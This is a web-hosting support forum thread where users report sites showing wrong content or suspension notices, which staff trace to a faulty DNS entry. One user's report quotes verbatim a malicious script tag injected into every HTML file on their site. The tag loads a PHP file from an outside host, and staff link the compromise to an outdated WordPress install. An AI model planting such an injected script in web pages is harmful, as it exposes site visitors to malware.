My blog just got hacked

[moviefa2]

I wonder if this has happened to anybody else tonight. It just happened this evening; I was on it not 2 hours ago when it was a movie blog, and now it is a sporting goods site all of a sudden. Frankly I don't what to do other than report this.

http://moviefan.pcriot.com/

 

[Livewire]

I'm not sure what caused that but it doesn't look like a hack so much as something malfunctioning; the account itself wasn't modified, but an entry on our nameserver was incorrect and was pointing to the wrong IP (but only for this specific domain). I've re-saved the DNS settings and confirmed that it did update through OpenDNS, but depending on your DNS provider (usually your ISP) it may take some time for the change to propagate. You may be able to speed up the process by running "ipconfig /flushdns" in a Windows command prompt and then restart the browser.

 

[moviefa2]

That worked! Thank you for the help.

 

[ohorosh211]

Looks like the same issue with me kiwi.pcriot.com. Site IP changed, site content changed but I can access CPanel. Please help!!!

 

[Livewire]

Should be fixed as well, I've notified an admin that it's happening more than once so we can work on identifying exactly what's causing it.

 

[ohorosh211]

OK, thank you!!! It works now

 

[moviefa2]

Okay, now this is different; my site just goes to an empty folder like nothing is there. I logged into cPanel and checked and the files are there. Are you all working on the server or has the ip been redirected again?

 

[leafypiggy]

Hi moviefa2:

We're working on a permanent fix for this. I apologize for the downtime. :'( I'll update you when I have more info.

 

[moviefa2]

Thank you.

 

[ohorosh211]

Hi again, just for information - my kiwi.pcriot.com also is showing empty folder now

 

[Livewire]

Fixed as above; we're still working on implementing the permanent fix so if it would change back, let us know and we'll keep repairing it until it's finally fixed fully

 

[ohorosh211]

It works, thank you!

 

[moviefa2]

Mine is working fine too. I'll update you if that changes. Thank you for your help.

 

[losetheb]

I was having the same problem with my sites also and now it says This Account Has Been Suspended sites are http://losethebuttfat.pcriot.com and http://cafenews.pcriot.com

 

[Livewire]

Should be fixed depending on how fast DNS propagates (see above).

 

[ohorosh211]

Again problem with kiwi.pcriot.com. But this time it's different, site is really hacked. Firefox browser reported something like "This site may harm your computer" about my site. I checked files and found that every html file is infected with line
<script type="text/javascript" src="http://www.pentagonlondon.co.uk/wp-admin/6czhkn3x.php?id=15074425"></script>
All infected files have modification time Sep 5,2014 12:47 AM I have closed site with password till problem is resolved.

 

[Livewire]

That particular compromise looks to be started from the demo_oleg/wp6 Wordpress install, which is running version 3.8 and is 9 months out of date (3.8 launched last December). With compromises of this nature, you would be responsible for cleanup as account security is the user's responsibility, and if we attempt cleanup there's a very good chance we would actually damage the site further. With us only having full-server backups, we wouldn't be able to restore an individual website from them either, so if we were to make things worse by accident we wouldn't be able to fix it.

If you have backups, I would recommend removing everything on the account and starting from a backup that wasn't infected, then immediately update all software to their latest versions. If no backups are available, then I would instead remove all files and start from fresh, vendor supplied files that are up-to-date only, as any outdated software with known exploits is a target for hackers as soon as they discover the location of it.

 

[ohorosh211]

Thank you for your reply. Fortunately I have backup and already restored files from it. I removed current WordPress installation which is used only for part of the site and will reinstall it later from scratch.

 

[slask36]

I seem to have the same problem as others have reported here: It says my account is suspended, but everything looks ok when I log in to my account. http://osterholm.pcriot.com

 

[Livewire]

Should be fixed, same directions as above (need to wait for DNS to propagate, blah blah blah blah blah). Admins know what caused it and I believe we have a solution in place to help prevent it in the future (if not, I know they're working on it, cause I will nag them incessantly until they tell me it's done ).